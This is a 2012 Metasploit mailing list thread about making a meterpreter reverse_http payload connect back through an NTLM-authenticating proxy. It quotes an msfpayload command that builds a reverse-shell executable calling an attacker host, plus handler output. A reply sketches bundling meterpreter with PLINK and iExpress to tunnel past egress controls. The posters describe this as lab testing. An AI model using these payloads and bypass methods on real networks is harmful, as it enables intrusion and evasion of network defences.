Metasploit mailing list archives
Re: meterpreter ntlm proxy bypass
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Fri, 13 Apr 2012 23:29:16 +0300
When using a proxy with NTLM auth, every HTTP request will get 407'ed first "i.e. denied access till further challenge-response action will take place to make sure you have the correct creds", after successfully finishing the challenge-response thing, *ANOTHER IDENTICAL* http request will be sent but will go through this time "if I'm wrong someone correct me". Given this brief introduction, as far as I can remember reverse_http does this using the WinInet API, which means it will take place transparently and if the user can browse the internet _without_being_asked_for_credentials_ , then reverse_http SHOULD be able to connect back to the multi/handler even through the proxy without a problem. I am not a native English speaker myself and I always have problems trying to let other people understand what I am trying to say...and I got a feeling that you might be having the same issue :) Please speak the universal language and attach the PCAP from the client and handler sides, if that's fine, so we may help you better solve your problem. Sherif Eldeeb On Fri, Apr 13, 2012 at 9:58 PM, audio audience <audience099 () gmail com> wrote:
Thanks for answer. First of all, is meterpreter can access basic authentication proxy ? Then, I changed my network labs. I setup a MS TMG server and enabled integrated auth. If computer is joined active directory, it's can access to internet over TMG. I ran meterpreter reverse_http payload, meterpreter automatical connect to proxy ip and port and get http request but it's doesn't complete NTLM auth. and TMG blocked this request. I saw the meterpreter traffic via wireshark, MS TMG is blocked meterpreter's http traffic; GET http://x.y.z.t/8YyR HTTP/1.0 Host: x.y.z.t Pragma: no-cache HTTP/1.1 407 Proxy Authentication Required ( Forefront TMG requires authorization to fulfill the request. Access to the Web Proxy filter is denied. ) Via: 1.1 WIN-1ADVF Proxy-Authenticate: Negotiate Proxy-Authenticate: Kerberos Proxy-Authenticate: NTLM Proxy-Authenticate: Digest qop="auth",algorithm=MD5-sess,nonce="+Upgraded+xh2sa123da14de32b881d8f64c125075a269ad11f1acd019f21333a41c0025df240d348959c41028a80443ef67b52380888306094e49f99",charset=utf-8,realm="xyz.com" Connection: Keep-Alive Proxy-Connection: Keep-Alive Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 4128 Are you have any idea for this subject ... 2012/4/11 Sherif El-Deeb <archeldeeb () gmail com>If the logged in user already is a member of the domain, is allowed internet access and the machine is joined to the domain, then reverse_http SHOULD go through the system configured proxy even with NTLM auth, no problem (thanks HD & Mubix!) ... (if you meet that criteria already try setting the LPORT at the mutli/handler to 80 since that might be the only port allowed). however, if the logged in user is not allowed internet connection, or the machine is not member of the domain (i.e. everythime you connect to the internet it pops-up asking for creds) you have to have the following: 1- You have to know the username, password and domain of an allowed-internet user. 2- the Proxy IP and port 3- you have to bundle "meterpreter" with a "NTLM-Auth-proxy-aware" program to tunnel through the connection for you, a tested-and-guaranteed example would be (SSH server listening on 443) + (PLINK with the -L switch) + (meterpreter with LHOST set to 127.0.0.1) + (some command-line kung-fu to add the host SSH key and glue everything together) + iExpress. As far as I know, there's nothing built-in that allows you to specify a username, pass, domain and the proxy:port to meterpreter :) I think I'll write a blog post about this someday :) but please beware that you have to know lots of things in advance to make this work. Sherif Eldeeb On Wed, Apr 11, 2012 at 10:49 PM, audio audience <audience099 () gmail com> wrote:Hello Everyone, I want to bypass ntlm supported proxy bypass with meterpreter. I tested it in my Labs; all outgoing traffics blocked by firewall for client. If client want to access internet, it's need to set windows username and password to ntlm auth. proxy. I created meterpreter payload this following options; # msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080 AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe For listening mode; msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_http): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST x.y.z.t yes The local listener hostname LPORT 8080 yes The local listener port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started HTTP reverse handler on http://x.y.z.t:8080/ [*] Starting the payload handler... And then i ran 8.exe to victim computer but proxy is blocked meterpreter http connection, because meterpreter didn't complate ntlm auth. Squid Log; 1334171617.857 0 a.b.c.d TCP_DENIED/407 1744 GET http://x.y.z.t:8080/l2eY - NONE/- text/html How i can bypass ntlm auth. with meterpreter payload. Thanks for supports _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- meterpreter ntlm proxy bypass audio audience (Apr 11)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)
- Re: meterpreter ntlm proxy bypass Adrián Puente Z. (Apr 12)
- Re: meterpreter ntlm proxy bypass audio audience (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)